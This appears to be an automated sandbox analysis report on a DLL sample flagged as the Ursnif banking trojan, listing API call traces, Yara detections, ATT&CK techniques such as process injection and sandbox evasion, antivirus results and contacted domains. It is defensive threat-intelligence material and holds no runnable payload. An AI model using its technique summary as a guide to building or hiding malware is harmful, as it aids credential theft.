Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B65CE cpuid		2_2_044B65CE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B65CE cpuid		2_2_044B65CE

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00401006 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,		2_2_00401006
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00401006 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,		2_2_00401006

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B65CE RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,		2_2_044B65CE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B65CE RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,		2_2_044B65CE

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004010D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,		2_2_004010D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004010D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,		2_2_004010D8

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.289458489.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289762811.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.505056221.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289651842.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289685101.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289724522.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289496678.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289545009.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289584112.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6644, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.289458489.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289762811.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.505056221.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289651842.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289685101.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289724522.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289496678.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289545009.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289584112.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6644, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	Process Injection12	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0pz1on1.dll	12%	ReversingLabs
0pz1on1.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.regsvr32.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File
2.2.regsvr32.exe.44b0000.3.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.remixd.com/privacy_policy.html	0%	Avira URL Cloud	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://www.blackfridaydeals.ch/elektronik-unterhaltung?utm_source=ms&utm_campaign=infopane-elec	0%	Avira URL Cloud	safe
https://bealion.com/politica-de-cookies	0%	Avira URL Cloud	safe
https://www.gadsme.com/privacy-policy/	0%	Avira URL Cloud	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	Avira URL Cloud	safe
https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-karte	0%	Avira URL Cloud	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=topnav	0%	Avira URL Cloud	safe
https://channelpilot.co.uk/privacy-policy	0%	Avira URL Cloud	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://www.admo.tv/en/privacy-policy	0%	Avira URL Cloud	safe
https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-live	0%	Avira URL Cloud	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=mestripe	0%	Avira URL Cloud	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&h=33	0%	Avira URL Cloud	safe
https://listonic.com/privacy/	0%	Avira URL Cloud	safe
https://quantyoo.de/datenschutz	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&h=33	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
contextual.media.net	23.54.113.52	true	false	high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	unknown
ocsp.sca1b.amazontrust.com	143.204.15.203	true	false	unknown
hblg.media.net	23.54.113.52	true	false	high
lg3.media.net	23.54.113.52	true	false	high
outbrain.map.fastly.net	151.101.2.132	true	false	unknown
edge.gycpi.b.yahoodns.net	87.248.118.22	true	false	unknown
s.yimg.com	unknown	unknown	false	high
web.vortex.data.msn.com	unknown	unknown	false	high
www.msn.com	unknown	unknown	false	high
srtb.msn.com	unknown	unknown	false	high
img.img-taboola.com	unknown	unknown	false	unknown
zem.outbrainimg.com	unknown	unknown	false	unknown
cvision.media.net	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://searchads.msn.net/.cfm?&&kp=1&	{4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.5.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.5.dr	false		high
https://www.remixd.com/privacy_policy.html	iab2Data[1].json.5.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com;Fotos	85-0f8009-68ddb2ab[1].js.5.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/news/other/das-l%c3%a4nderspiel-schweiz-ukraine-findet-weder-heute-noch-mo	de-ch[1].htm.5.dr	false		high
https://srtb.msn.com:443/notify/viewedg?rid=01993e53dc8d4e9880fcbea0201e39f7&r=infopane&i=2&	auction[1].htm.5.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.5.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	85-0f8009-68ddb2ab[1].js.5.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.5.dr	false		high
https://www.msn.com/de-ch/news/other/wohl-kein-nati-spiel-am-dienstag-in-luzern/ar-BB1b5oQw?ocid=hpl	de-ch[1].htm.5.dr	false		high
https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1	auction[1].htm.5.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://www.msn.com/de-ch/finanzen/top-stories/zahlen-sie-kontaktlos-der-aufruf-befeuert-das-bancoma	de-ch[1].htm.5.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.5.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.freundin.de/astrologie-sternzeichen-fremde-handys-ausspionieren	de-ch[1].htm.5.dr	false		high
https://web.vortex.data.msn.com/collect/v1	de-ch[1].htm.5.dr	false		high
https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site	de-ch[1].htm.5.dr	false		high
https://www.skype.com/	de-ch[1].htm.5.dr	false		high
https://www.msn.com/de-ch/news/other/pl%c3%b6tzlich-steht-da-roger-federer-und-fragt-nach-marroni/ar	de-ch[1].htm.5.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.5.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.5.dr	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.5.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://client-s.gateway.messenger.live.com	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.brightcom.com/privacy-policy/	iab2Data[1].json.5.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.5.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	{4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.5.dr	false		high
https://www.blackfridaydeals.ch/elektronik-unterhaltung?utm_source=ms&utm_campaign=infopane-elec	de-ch[1].htm.5.dr	false	Avira URL Cloud: safe	unknown
https://bealion.com/politica-de-cookies	iab2Data[1].json.5.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch	de-ch[1].htm.5.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-verticals-shoppinghub	de-ch[1].htm.5.dr	false		high
https://twitter.com/i/notifications;Ich	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.5.dr	false		high
https://www.gadsme.com/privacy-policy/	iab2Data[1].json.5.dr	false	Avira URL Cloud: safe	unknown
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	iab2Data[1].json.5.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.5.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.5.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.5.dr	false		high
https://docs.prebid.org/privacy.html	iab2Data[1].json.5.dr	false		high
https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-karte	de-ch[1].htm.5.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.msn.com/de-ch/news/other/gstaad-springt-f%c3%bcr-moudon-als-etappenort-ein/ar-BB1b9zw4?o	de-ch[1].htm.5.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.5.dr	false		high
https://www.skype.com/de/download-skype	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	iab2Data[1].json.5.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/news/other/ich-habe-immer-gemeint-dass-wir-%c3%a4lteren-den-jungen-egal-si	de-ch[1].htm.5.dr	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.5.dr	false		high
https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=topnav	de-ch[1].htm.5.dr	false	Avira URL Cloud: safe	unknown
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://channelpilot.co.uk/privacy-policy	iab2Data[1].json.5.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.5.dr	false	Avira URL Cloud: safe	low
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.admo.tv/en/privacy-policy	iab2Data[1].json.5.dr	false	Avira URL Cloud: safe	unknown
https://policies.oath.com/us/en/oath/privacy/index.html	auction[1].htm.5.dr	false		high
https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath	iab2Data[1].json.5.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	false		high
https://outlook.com/	de-ch[1].htm.5.dr	false		high
https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-live	de-ch[1].htm.5.dr	false	Avira URL Cloud: safe	unknown
https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862	de-ch[1].htm.5.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	{4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.5.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"	auction[1].htm.5.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	{4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/schweiz/krawallanten-halunke-so-giftig-wird-um-die-konzerninit	de-ch[1].htm.5.dr	false		high
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.5.dr	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.5.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=mestripe	de-ch[1].htm.5.dr	false	Avira URL Cloud: safe	unknown
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.5.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.5.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&h=33	auction[1].htm.5.dr	false	Avira URL Cloud: safe	unknown
https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=WNGUehQGIS_nMhkBJqxO1xjHDipwjlf7ZzWwtmUnd2kH	auction[1].htm.5.dr	false		high
https://onedrive.live.com/about/en/download/	85-0f8009-68ddb2ab[1].js.5.dr	false		high
http://popup.taboola.com/german	auction[1].htm.5.dr	false		high
https://listonic.com/privacy/	iab2Data[1].json.5.dr	false	Avira URL Cloud: safe	unknown
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.5.dr	false		high
https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=GL2sgJIGIS_livS81ZoWU09GVJ5wwgaNXKxuYmLaHpATwdjJ	auction[1].htm.5.dr	false		high
https://twitter.com/	de-ch[1].htm.5.dr	false		high
https://www.msn.com/de-ch/news/other/einweg-masken-heissen-nicht-so-weil-man-sie-auf-den-weg-schmeis	de-ch[1].htm.5.dr	false		high
https://quantyoo.de/datenschutz	iab2Data[1].json.5.dr	false	Avira URL Cloud: safe	unknown
https://outlook.live.com/calendar	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.msn.com/de-ch/sport/fussball/alle-ukrainer-in-quarant%c3%a4ne-nati-spiel-von-heute-ist-a	de-ch[1].htm.5.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	auction[1].htm.5.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/news/other/rechtsextreme-trainieren-und-posieren-vermummt-in-luzern/ar-BB1	de-ch[1].htm.5.dr	false		high
https://onedrive.live.com/#qt=mru	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&h=33	auction[1].htm.5.dr	false	Avira URL Cloud: safe	unknown
https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap	auction[1].htm.5.dr	false		high
https://www.msn.com?form=MY01O4&OCID=MY01O4	de-ch[1].htm.5.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
143.204.15.203	unknown	United States	16509	AMAZON-02US	false
87.248.118.22	unknown	United Kingdom	203220	YAHOO-DEBDE	false
151.101.2.132	unknown	United States	54113	FASTLYUS	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	320322
Start date:	19.11.2020
Start time:	09:10:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0pz1on1.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.winDLL@13/132@11/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 54.6% (good quality ratio 51.7%) Quality average: 78.8% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 63% Number of executed functions: 36 Number of non-executed functions: 37
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.12.134.45, 204.79.197.203, 204.79.197.200, 13.107.21.200, 23.10.249.18, 23.10.249.32, 65.55.44.109, 104.43.193.48, 23.54.113.52, 23.54.113.104, 51.104.144.132, 104.42.151.234, 152.199.19.161, 104.43.139.144, 8.247.205.254, 8.248.121.254, 8.253.145.105, 8.248.91.254, 8.238.85.126, 52.155.217.156, 51.103.5.186, 20.54.26.129, 23.10.249.43, 23.10.249.26, 51.104.139.180 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, db3p-ris-pf-prod-atm.trafficmanager.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, skypedataprdcolcus16.cloudapp.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/320322/sample/0pz1on1.dll

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
87.248.118.22	http://us.i1.yimg.com	Get hash	malicious	Browse	us.i1.yimg.com/favicon.ico
	http://www.prophecyhour.com	Get hash	malicious	Browse	us.i1.yimg.com/us.yimg.com/i/yg/img/i/us/ui/join.gif
